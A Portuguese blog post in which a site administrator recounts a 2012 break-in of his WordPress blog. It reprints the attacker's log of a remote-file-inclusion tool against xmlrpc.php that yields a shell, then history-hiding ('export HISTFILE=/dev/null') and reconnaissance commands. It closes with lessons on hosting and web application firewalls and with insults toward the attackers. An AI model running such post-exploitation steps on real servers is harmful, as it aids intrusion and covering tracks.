Há dois anos, este blog foi vítima de uma ataque devido a exploração de uma vulnerabilidade conhecida e com um exploit mais do que divulgado, mas que eu, o seu administrador, cagai para ela na época.

Analisando a divulgação da vulnerabilidade e sua exploração, concluí que parte da culpa estava no fato do blog estar hospedado no kinghost.com.br – fornecedor de hospedagem que reclamei durante anos e não recomendo nem por um decreto presidencial.

Vejam os detalhes abaixo do ataque logo abaixo:

umad:~/pentest/cusom/# ./l1c34n4 -h blog.corujadeti.com.br/xmlrpc.php -p 80 -v6 -rfi=list.txt

[+] l1c34n4 xplt – priv8 priv8 priv8 [+]
[+] target: 2804:10:5::89:144 [+]
[+] nginx Port: 80 [+]
[+] rfi list: list.txt [+]
[+] finding offset… [+]
[+] testing for rfi [+]
[+] g0tsh3ll! [+]

sh-3.3$ export HISTFILE=/dev/null

sh-3.3$ echo 3u qu3r0 m4is eh qu3 m3u p4u cr3sc4
3u qu3r0 m4is eh qu3 m3u p4u cr3sc4

sh-3.3$ whoami
corujadeti

sh-3.3$ id
uid=724(corujadeti) gid=725(corujadeti) groups=504(tar),725(corujadeti)

sh-3.3$ env
PHPRC=/usr/local/fastcgi/php.ini/php.corujadeti.ini
USER=root
FCGI_WEB_SERVER_ADDRS=127.0.0.1
PHP_FCGI_CHILDREN=10
PATH=/usr/bin:/bin
PWD=/home/corujadeti/www/blog/
SHLVL=1
PHP_FCGI_MAX_REQUESTS=10000
_=/usr/bin/env

sh-3.3$ df -ah
Filesystem Size Used Avail Use% Mounted on
/dev/sda1 35G 19G 15G 56% /
proc 0 0 0 – /proc
sysfs 0 0 0 – /sys
devpts 0 0 0 – /dev/pts
/dev/sda3 11G 529M 11G 5% /var
none 0 0 0 – /proc/sys/fs/binfmt_misc
tmpfs 1.0G 77M 948M 8% /tmp
/dev/sdb1 250G 242G 8.1G 97% /home
tmpfs 1.0G 172M 853M 17% /home/logs

sh-3.3$ uname -an
Linux web331.kinghost.net 2.6.37 #1 SMP Tue Jan 25 13:31:03 BRST 2011 x86_64 x86_64 x86_64 GNU/Linux

Continuando..

Caso o pessoal do PR0J3KT M4YH3M BR4Z1L tivesse um pouco mais de QI, saberia que os seus clientes da kinghost não possuem acesso administrativo, root ou qualquer coisa parecida, junto aos servidores linux responsáveis pela hospedagem dos sites/portais, e com isso, não podem implementar qualquer tipo de hardening, seja um simples chmod 600 ou um chroot.

Sim, o kinghost faz você ficar a mercê de suas configurações e hardening, fracos por sinal; e pior, houve casos em que o upgrade do wordpress da bosta em todo o seu ambiente.

Lição aprendida, como sempre; parti para migração do blog.

Escolhi a digital ocean como provedor de solução dos meus servers.

Sim, possuo mais de um server na arquitetura do blog, e com isso, consegui distribuir a carga, suportando a porrada de ataques DDoS que tomei nos meses subsequentes. E mais, parti para uma solução de web application firewall, o da sucuri.

Resultado —- bando de cuz**** do PR0J3KT M4YH3M BR4Z1L — ataquem agora, quero ver …. ??????

O que aprendi com o ataque sofrido pelo M4YH3M BR4Z1L, o grupo de hackers mais (cof, cof, cof, cof..) do Brasil ?:

  • Graças a um exploit amplamente divulgado, eles foram capazes de atacar um único blog e executar alterações no php, sem afetar em nada o servidor linux que ele era utilizada para rodar. Fracos, pois se tivessem conhecimento avançado, como dizem possuir, teriam causado estragos em todos os clientes da kinghost. Coisa que não aconteceu.
  • Segundo ponto, não deixe na mão dos outros, nem por uma questão de gerenciamento de tempo, aquilo que você sabe de fazer de melhor e que te pagam para tal – que no meu caso foi a instalação, configuração, hardening e performance dos servidores do blog.
  • Terceiro e último, mas não menos importante – tenha uma solução de Web application firewall, mesmo que seja um mod_Security com regras do atomic. Funciona e muito bem, isso eu posso garantir, caso contrário o pessoal do PR0J3KT M4YH3M BR4Z1L teria invadido o blog de novo. Como são uns malas e não garantem tudo aquilo que manjam, o blog não estaria no ar e funcionando de vento em popa, até agora..

Uma informação importante para os novatos em SI: sofrer ataques, analisá-los, seja focando no método de execução, pontos explorados e efeitos, faz parte do aprendizado dos verdadeiros profissionais da área. E isso que diferencia os homens dos moleques e que garante a empregabilidade.

Porque chegar em uma entrevista de emprego e responder que nenhum dos servidores que você suportou ou suporte sofreu um ataque, onde você realizou a análise, implementou contra-medidas e, com isso, evitou novos ataques, é passar atestado de despreparado ou que não possui experiência alguma.

atualização: o ataque foi realizado no dia 15/06/2012 — uma salva de palmas para algo que foi realizado há 3 anos.

Atualização 2: Mais engraçado disso tudo é ver, o pseudo-hacker, Danilo colocando mais lenha na fogueira. Gh0sT, tem livro novo na praça, vai estudar…